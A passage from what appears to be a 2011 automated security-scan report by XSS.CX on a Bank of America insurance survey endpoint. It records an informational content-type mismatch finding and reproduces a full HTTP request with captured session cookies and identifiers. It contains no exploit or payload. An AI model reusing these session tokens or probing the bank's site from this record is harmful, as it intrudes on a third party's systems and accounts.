SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

14.4. https://www9.bankofamerica.com/insurance/surveyInitPopupAction.go previous

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyInitPopupAction.go

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /insurance/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/insurance/property-and-auto/overview.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98

Response

Report generated by XSS.CX at Thu Oct 06 10:49:25 CDT 2011.